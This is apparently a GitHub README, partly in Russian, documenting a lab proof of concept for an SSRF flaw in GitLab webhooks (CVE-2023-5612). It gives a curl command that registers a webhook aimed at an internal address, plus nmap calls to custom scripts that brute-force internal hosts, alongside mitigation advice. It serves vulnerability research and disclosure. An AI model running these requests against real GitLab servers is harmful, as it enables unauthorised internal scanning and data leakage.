# CVE-2023-5612 – GitLab SSRF via Webhook URL (PoC & Analysis)

## 📌 CVE Overview
- **CVE-ID:** CVE-2023-5612  
- **Severity:** High (CVSS: 8.1 Base Score)
- **Type:** Server-Side Request Forgery (SSRF)
- **Component:** GitLab CE/EE Webhooks
- **Affected Versions:** GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

## 🧠 Description
An SSRF vulnerability in GitLab CE/EE allows attackers with valid Project Maintainer access to send crafted requests to arbitrary internal services via malicious webhook URLs. Exploitation leads to internal network scanning, metadata leakage, or further pivoting.

---

## ✅ Exploit Conditions
- У злоумышленника есть **maintainer**-доступ к проекту
- GitLab не имеет жесткой фильтрации или валидации URL-хуков

---

## ⚙️ PoC Steps (Manual)

```bash
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks
```

## 🧱 Environment & Setup

``` Эксплуатация проводилась в изолированной лабораторной среде:
- Kali Linux внутри виртуальной машины, развернутой специально под тестирование
- Поднятый через Docker экземпляр уязвимого GitLab CE (порт 8080)
- Внутри GitLab:
- Создан тестовый проект
- Сгенерирован Personal Access Token (glpat-...) с правами Maintainer
- Для внутреннего SSRF-таргета был поднят минимальный HTTP-сервис на 127.0.0.1:8888
```

## 🧠 Methodology
``` Исследование выполнялось в несколько этапов:
- Подтверждение уязвимости вручную через curl (см. PoC)
- Создание кастомных NSE-скриптов:
gitlab-ssrf.nse: точечная проверка SSRF
gitlab-ssrf-brute.nse: автоматический перебор внутренних адресов
- Тестирование с nmap -d и --script-trace, для анализа поведения API и фиксации результатов
- Получение отклика 401 Unauthorized от внутреннего сервиса, что указывает на успешный SSRF
- Успешный запрос вернет `201 Created` либо ошибку вида `401 Unauthorized`, что указывает на SSRF-доступ.
``` 

---

## 🛠 NSE Script (Manual Trigger) 

```bash
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>
```

## 🧪 NSE Script (Bruteforce Internal URLs)

```bash
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>
```

---

## 📈 Conclusion

```
В ходе работы над уязвимостью **CVE-2023-5612** был воспроизведён успешный SSRF-атакующий сценарий с доступом к внутренним адресам через API GitLab CE. Это демонстрирует, насколько важно ограничивать возможности вебхуков и внедрять валидацию URL-адресов на стороне сервера.

```

 ## 🎯 **Цель выполнена:**  
- SSRF подтверждён  
- NSE-инструментарий реализован  
- Проект задокументирован и открыт для сообщества

---

## 📂 Repo Structure
```
.
├── gitlab-ssrf.nse             # NSE script for manual SSRF verification
├── gitlab-ssrf-brute.nse       # NSE brute script to scan internal hosts/ports
├── screenshots/                # Скрины выполнения PoC и подтверждения уязвимости
└── README.md                   # Этот файл
```

---

## 🖼 Screenshots
- ✅ Успешный SSRF с возвратом 401 Unauthorized
- 📜 Логи nmap c отработкой скрипта
- 📦 Добавление вебхука через API

---

## ⚠️ Mitigation
- Upgrade GitLab to >= 16.2.7 / 16.3.4 / 16.4.1
- Ограничить outbound HTTP через egress firewall
- Использовать internal allow-lists для вебхуков

---

## 🧠 Author & Contact
**Pavel Topskiy**  
[GitHub](https://github.com/TopskiyPavelQwertyGang) • Security Analyst, Red Team Analyst

---

## 📅 Timeline
- **June 2025:** Анализ PoC и уязвимости
- **5 июня 2025:** Написание кастомного NSE-скрипта и тестов

---

## 🔐 Disclaimer
All testing was done in isolated lab environments on intentionally vulnerable versions. Do not use this against unauthorized systems. Respect ethical hacking principles.
